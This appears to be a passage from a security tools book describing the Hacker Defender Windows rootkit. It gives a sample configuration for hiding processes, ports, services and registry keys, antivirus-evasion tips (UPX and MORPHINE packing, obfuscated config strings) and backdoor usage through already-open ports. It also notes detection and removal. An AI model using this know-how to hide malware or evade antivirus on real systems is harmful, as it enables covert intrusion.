Rootkit technology is not really new; it began back in the Unix world as a group of Trojan applications that replaced the standard ones for hiding files and providing higher access. While detection technique evolved using integrity detection and other means, the rootkit also evolved by moving from the user space to the more powerful kernel space, usually as kernel modules and using different techniques to stay hidden. Contrary to the backdoor that offers more functionally to the remote administrator, the role of the rootkit is mainly to hide itself and other applications. Usually the race between the detector and the rootkit is won by the first one to be installed on the system. Therefore it is important to be ready and plan ahead before putting any system into production. Trying to detect and remove a rootkit after it is installed, if nothing was done previously, could end up being a very difficult task—the best time-saving solution might be to format and re-install the whole system.
There are several rootkits available. We'll peer into the best ones for each platform and note their strengths and weaknesses. If you want more information on rootkit technology and more specific "under the hood" documentation of how they work and interact with the various operating systems they can be used against, a great resource is the web site http://www.rootkit.com. In addition, the book RootKits: Subverting the Windows Kernel by Jamie Butler and Greg Hoglund (Addison-Wesley) is a great resource.
Hacker Defender (hxdef) is an open source Windows NT/2000/XP rootkit. It is not just a proof of concept (like most rootkits); it is a full-fledged rootkit with multiple features. hxdef is able to hide its process, port, registry entries, and files by hooking multiple Windows APIs. Since it is based on hooking (replacing valid system calls or DLLs by Trojaned ones), it can bypass multiple detection systems except for some, such as IceSword (see Windows Rootkit Detectors), Backlight, or Kaspersky. Note that other antivirus apps might also detect hxdef.
The following piece of code is a configuration file (the .ini file) for Hacker Defender 1.00. You must modify this file to fit your needs.
Always be careful when naming the file(s) that you hide. Hacker Defender hides everything that matches the given key, so be sure not to choose a generic name such as System32; rather, choose an uncommon name. Hiding by using the name of normal Windows drivers, keys, values, or programs might end up in system instability.
[Hidden Table] # table to be hidden hxdef* rcmd.exe [Root Processes] # Process to be hidden hxdef* rcmd.exe [Hidden Services] #Service name to be hidden HackerDefender* [Hidden RegKeys] # Registry keys to be hidden HackerDefender100 LEGACY_HACKERDEFENDER100 HackerDefenderDrv100 LEGACY_HACKERDEFENDERDRV100 [Hidden RegValues] # Registry values to be hidden [Startup Run] # software to start when the rootkit is loaded [Free Space] # fake free space to be added to the hard drive, is useful if you use the host as a file server [Hidden Ports] #port to be hidden TCP: 8080, 1234 UDP: 12,13,14,15 [Settings] Password=hxdef-rulez BackdoorShell=hxdef.exe FileMappingName=_-=[Hacker Defender]=-_ ServiceName=HackerDefender100 ServiceDisplayName=HXD Service 100 ServiceDescription=powerful NT rootkit DriverName=HackerDefenderDrv100 DriverFileName=hxdefdrv.sys
By default, Hacker Defender hides itself. Even though it does provide a basic backdoor (cmd.exe), it is usually better to use the stealth capacity of Hacker Defender to hide more appropriate tools for your personal tasks, whether it is an exploitation agent from Core Impact (see Running an Exploit and Core Impact Overview ), a Python shell, a botnet client, or a user-monitoring system. Hacker Defender hides stuff (e.g., process, port, registry, service) and does it well. If you're trying to use Hacker Defender for anything more, it's best to rely on a different tool.
By default, most files provided with Hacker Defender are detected by anti-virus software. The best way to circumnavigate this is to pack the compiled binary with UPX and MORPHINE and to modify the .ini file by adding extra characters such as |, <, >, :, \, / and ", which are ignored on all lines except the following:
[Startup run] # software to be started [Free Space] # free space to add to the drive [Hidden Ports] # list of port to be hidden
A modified configuration entry might look like this:
"[:\:R:o:o\:t: :P:r>:o:c<:e:s:s:e<:s:>] h<x>d<e>:f<* <\r\c:\m\d.\e\x\e
Such transformation makes it harder for software to do string matching from raw devices. These tasks protect these files from most anti-virus software because literal binary matches do not work.
Hacker Defender offers a small utility to connect to its rookit from a remote system. The cool part is its ability to use ports already opened by other applications. Since the rootkit can watch any incoming communication, the backdoor integrated in the system uses a 256-byte key to connect to the rootkit over a port already open by another application, such as IIS. So any open port receiving over 256 bytes on the target system could be used to communicate with the backdoor (this includes HTTP, SMTP, Telnet, SMB, and RPC). The backdoor provided in Hacker Defender is a simple command prompt. While it might not be as powerful as other backdoors, it provides the basic functions to install and run a full-fledged remote administration application.
Hacker Defender can be started from the command prompt using the provided executable. This executable installs and runs the service module necessary for the hiding functionality. Table 12-1 lists the switches available when starting the Hacker Defender Flags.
Table 12-1. Switches available when launching Hacker Defender
Switch | Description |
|---|---|
| Installs only the service and does not run. |
| Updates the settings from the .ini file. |
| Does not install services and runs normally. |
| Removes hxdef from memory and kills all running backdoor connections; stopping the hxdef service does the same. |
An example is:
>hxdef100.exe -:refreshIf you did not change the default settings, you can run the shell and stop the service with:
>net stop HackerDefender100If you did change the default setting, you must remember the name of the service you set or use tools such as IceSword (http://pjf.blogone.net) to find the running service (see Windows Rootkit Detectors). Otherwise, you will be trying to remove something that you cannot really see.